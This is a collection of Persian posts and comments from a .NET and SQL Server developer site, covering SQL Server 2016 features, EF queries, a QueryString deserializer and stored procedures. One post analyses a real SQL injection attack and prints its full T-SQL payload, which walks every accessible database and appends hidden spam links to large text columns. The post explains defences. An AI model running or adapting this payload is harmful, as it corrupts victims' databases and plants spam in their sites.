وحید محمدطاهری وحید محمدطاهری
اشتراک‌ها
انتشار SQL Server 2016 CTP 3.1

New In-Memory OLTP improvements in CTP3.1 include:

  • Unique indexes in memory-optimized tables, to complement the support for unique constraints that was released in CTP3
  • LOB data types varchar(max), nvarchar(max), and varbinary(max) in memory-optimized tables and natively compiled modules
  • Indexes with NULLable key columns in memory-optimized tables

Syntax inputdate AT TIME ZONE timezone.

  • Inputdate: An expression that can be resolved to a smalldatetime, datetime, datetime2, or datetimeoffset value.
  • Timezone: Name of the destination time zone in standard format as enumerated by Windows. Available time zones can be found by querying sys.time_zone_info.

SQL Server Analysis Services (SSAS) updates allow upgrading your existing models to 1200 compatibility level and a JSON editor for SSDT;

SQL Server PowerPivot and Reporting Services/Power View for SharePoint 2016 available now with CTP3.1!
انتشار SQL Server 2016 CTP 3.1
‫۸ سال و ۱۰ ماه قبل، دوشنبه ۱۶ آذر ۱۳۹۴، ساعت ۰۳:۰۹
سالار ربال سالار ربال
نظرات مطالب
مباحث تکمیلی مدل‌های خود ارجاع دهنده در EF Code first
با تشکر.
کوئری نوشته شده را توسط DNTProfiler بازبنی کردم و به کوئری T-SQL زیر رسیدم:
SELECT [Extent1].[Id] AS [Id],
       [Extent1].[Body] AS [Body],
       [Extent1].[ReplyId] AS [ReplyId],
       [Extent2].[Id] AS [Id1],
       [Extent2].[Body] AS [Body1],
       [Extent2].[ReplyId] AS [ReplyId1]
FROM   [dbo].[BlogComments] AS [Extent1]
       LEFT OUTER JOIN
       [dbo].[BlogComments] AS [Extent2]
       ON [Extent1].[ReplyId] = [Extent2].[Id]
WHERE  ([Extent1].[Id] >= 2)
       AND (([Extent1].[ReplyId] = [Extent1].[ReplyId])
            OR (([Extent1].[ReplyId] IS NULL)
                AND ([Extent1].[ReplyId] IS NULL))
            OR ([Extent2].[Id] IS NULL));
این کوئری فقط زیر شاخه‌های نود مورد نظر را واکشی نمیکند بلکه علاوه بر آن نظراتی که زیر شاخه این نود نیستند رو به همراه زیرشاخه هاش ، واکشی میکند.

‫۸ سال و ۱۲ ماه قبل، پنجشنبه ۱۴ آبان ۱۳۹۴، ساعت ۲۲:۰۳
علی یگانه مقدم علی یگانه مقدم
نظرات مطالب
روشی برای DeSerialize کردن QueryString به یک کلاس
جهت افزودن پشتیبانی از حالت POST کد متد را به شکل زیر تغییر دهید:
 public T GetFromQueryString<T>(RequestType type=RequestType.GET) where T : new()
        {
            var obj = new T();
            var properties = typeof(T).GetProperties();

            var queries =new NameValueCollection();
            if(type==RequestType.GET)
                queries= HttpContext.Current.Request.QueryString;
            else
            {
                queries = HttpContext.Current.Request.Form;
            }

            foreach (var property in properties)
            {
                foreach (Attribute attribute in property.GetCustomAttributes(true))
                {
                    var requestBodyField = attribute as RequestBodyField; 
                    if (requestBodyField == null) continue;

                    //get value of query string
                    var valueAsString = queries[requestBodyField.Field];

                    if (valueAsString == null)
                    {
                        var keys = from key in queries.AllKeys where key.StartsWith(requestBodyField.Field) select key;

                        if(!keys.Any())
                            continue;

                        var collection = new NameValueCollection();

                        foreach (var key in keys)
                        {
                            var openBraketIndex = key.IndexOf("[", StringComparison.Ordinal);
                            var closeBraketIndex = key.IndexOf("]", StringComparison.Ordinal);

                            if (openBraketIndex < 0 || closeBraketIndex < 0)
                                throw new Exception("query string is crupted.");

                            openBraketIndex++;
                            //get key in [...]
                            var fieldName = key.Substring(openBraketIndex, closeBraketIndex - openBraketIndex);
                            collection.Add(fieldName, queries[key]);
                        }
                        property.SetValue(obj, collection, null);
                        continue;
                    }

                    var converter = TypeDescriptor.GetConverter(property.PropertyType);
                    var value = converter.ConvertFrom(valueAsString);

                    if (value == null)
                        continue;

                    property.SetValue(obj, value, null);
                }
            }
            return obj;
        }
‫۹ سال قبل، جمعه ۱۷ مهر ۱۳۹۴، ساعت ۱۷:۵۶
وحید نصیری وحید نصیری
نظرات مطالب
خلاصه‌ای در مورد SQL Server CE
وضعیت SQL Server CE در سال 2018
توسعه‌ی فعال این بانک اطلاعاتی مدت‌ها است که توسط مایکروسافت خاتمه یافته‌است. پشتیبانی رسمی آن در تاریخ 2016 -07-12 پایان یافته و پشتیبانی تمدید شده‌ی آن در تاریخ 2021-07-13 پایان می‌یابد و بجای آن LocalDB برای کارهای سبک توصیه می‌شود. همچنین اگر هدف شما کار با بانک‌های اطلاعاتی Embedded است، بهتر است از SQLite استفاده کنید. جالب است بدانید هرچند EF Core از SQL Server CE پشتیبانی می‌کند، اما پروایدر آن توسط مایکروسافت تهیه نشده‌است. برعکس SQLite پشتیبانی کاملی را توسط مایکروسافت پیدا کرده‌است؛ چه از لحاظ پروایدر EF Core و چه از لحاظ پروایدر ADO.NET.
‫۵ سال و ۱۰ ماه قبل، سه‌شنبه ۲۰ آذر ۱۳۹۷، ساعت ۱۶:۱۲
سعد سعد
اشتراک‌ها
چگونه با SQL Server 2017 بکاپهای سریعتری بگیریم

Indirect Checkpoints is not just about predictable recovery, it enables SQL Server to scale and run faster 

In SQL Server 2012, indirect checkpoint was first introduced in SQL Server and it was made a default algorithm for all new databases starting SQL Server 2016. 
چگونه با SQL Server 2017 بکاپهای سریعتری بگیریم
‫۶ سال و ۱۰ ماه قبل، یکشنبه ۵ آذر ۱۳۹۶، ساعت ۱۵:۲۱
وحید نصیری وحید نصیری
مطالب
نمونه‌ای از تزریق اس کیوال جهت درج تبلیغات مخفی شده‌ی در رکوردهای سایت
مدتی هست در لاگ‌های ELMAH سایت، یک چنین تزریق‌های اس کیوال ناموفقی مشاهده می‌شوند:


اگر اخیرا به دیتابیس شما رکوردهایی با divهای نامرئی ("div style="display:none) که داخل آن‌ها تبلیغات یک سری سایت‌های کذایی وجود دارند، اضافه شده‌اند، حتما مورد حمله‌ی SQL Injection فوق واقع شده‌اید.

مواردی را که باید بررسی کنید:
الف) آیا در سایت، قسمت ثبت ارجاعات را دارید؟
قبل از اینکه HTTP Referrer را بررسی کنید، یکبار آن‌را به عنوان پارامتر سازنده‌ی new Uri قرار دهید. به این صورت این حمله دقیقا در همین مرحله، با صدور یک استثناء، به علت معتبر نبودن آدرس دریافتی متوقف می‌شود:


ب) آیا در سایت، نوع مرورگرهای کاربران را نیز ذخیره می‌کنید؟
با توجه به شکل اول، این حمله تنها زمانی مؤثر خواهد بود که از کوئری‌های غیرپارامتری و یا از ORMها استفاده نمی‌کنید.

ج) آیا به محتوای دریافت شده‌ی از طریق کوئری استرینگ‌ها دقت دارید؟
این مورد نیز همانند حالت ب است.


بررسی ساختار این حمله

کوئری ارسالی (البته با حذف آدرس سایت‌های کذایی آن)، یک چنین فرمتی را دارد:
DECLARE @b AS CURSOR;

DECLARE @s AS VARCHAR (8000);

DECLARE @w AS VARCHAR (99);

SET @b = CURSOR
    FOR SELECT DB_NAME()
        UNION
        SELECT name
        FROM   sys.databases
        WHERE  (has_dbaccess(name) != 0)
               AND name NOT IN ('master', 'tempdb', 'model', 'msdb', DB_NAME());

OPEN @b;

FETCH NEXT FROM @b INTO @w;

WHILE @@FETCH_STATUS = 0
    BEGIN
        SET @s = 'begin try use ' + @w + ';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set 
[''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">desi adult stories <a 
href="http://www.site.com/">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''stories'''' when 1 then ''''read'''' else ''''stories'''' end +''''</a> stories</div>'''' 
else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME 
WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while 
@@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';
        EXECUTE (@s);
        FETCH NEXT FROM @b INTO @w;
    END

CLOSE @b;
در اینجا ابتدا لیست بانک‌های اطلاعاتی موجود دریافت می‌شوند. سپس با استفاده از try/catch سعی در به روز رسانی رکوردهای جداولی که دارای فیلدهایی از نوع varchar یا nvarchar از نوع max هستند، می‌کند. از try/catch هم به این دلیل استفاده کرده‌است که در یک سایت اشتراکی، شما فقط به بانک اطلاعاتی خودتان دسترسی دارید و البته اگر از کاربر sa استفاده می‌کنید که ... هم اکنون تمام بانک‌های اطلاعاتی شما آلوده شده‌اند!
به روز رسانی آن هم رندام است. یعنی در یک سری رکورد، بر اساس case نوشته شده، تبلیغ خواندن و در یک سری دیگر، تبلیغ داستانی را در انتهای آن‌ها درج می‌کند.
‫۸ سال و ۱۰ ماه قبل، سه‌شنبه ۲۴ آذر ۱۳۹۴، ساعت ۰۰:۱۵
وحید نصیری وحید نصیری
نظرات مطالب
دریافت اطلاعات از پایگاه داده بواسطه Stored Procedure در EF Core 2.0
FirstOrDefault یعنی select top 1. در SQL Server نمی‌توان یک چنین کاری را بر روی یک رویه‌ی ذخیره شده به صورت مستقیم انجام داد. یعنی نمی‌توان نوشت:
SELECT top 1 * FROM (EXEC MyProc) AS TEMP
چنین چیزی توسط خود SQL Server پشتیبانی نمی‌شود. علت هم اینجا است که یک SP می‌تواند multiple result sets را بازگشت دهد؛ یعنی می‌تواند چندین select را با چندین ساختار متفاوت، بازگشت دهد و به همین جهت برای کار با Select مناسب نیست. مگر اینکه یک جدول موقتی را ایجاد کنید، سپس داده‌های خروجی رویه‌ی ذخیره شده را در آن ثبت کنید. دست آخر از آن جدول موقتی گزارش بگیرید. EF Core چنین کاری را برای شما انجام نمی‌دهد. بنابراین  FirstOrDefault در اینجا فقط یک client side evaluation خواهد بود که در نگارش 3 آن ممنوع شده‌است. اما می‌توانید client side evaluation را به صورت زیر بر روی FromSqlRaw فعال کنید:
context.Products.FromSqlRaw("[dbo].[Ten Most Expensive Products]").AsEnumerable().FirstOrDefault();
‫۴ سال و ۱۱ ماه قبل، چهارشنبه ۱۵ آبان ۱۳۹۸، ساعت ۱۰:۵۵
علیرضا آرانی علیرضا آرانی
اشتراک‌ها
بررسی Row Level Security در SQL Server 2016 به صورت عملی

Row Level security که با SQL Server 2016 معرفی شد به ما امکان اعطای مجوز برای نمایش برخی از سطرها به برخی از کاربران را می‌دهد.

در این لینک به صورت عملی به بررسی این ویژگی پرداخته شده است.

بررسی Row Level Security در SQL Server 2016 به صورت عملی
‫۷ سال و ۴ ماه قبل، یکشنبه ۲۸ خرداد ۱۳۹۶، ساعت ۱۶:۰۰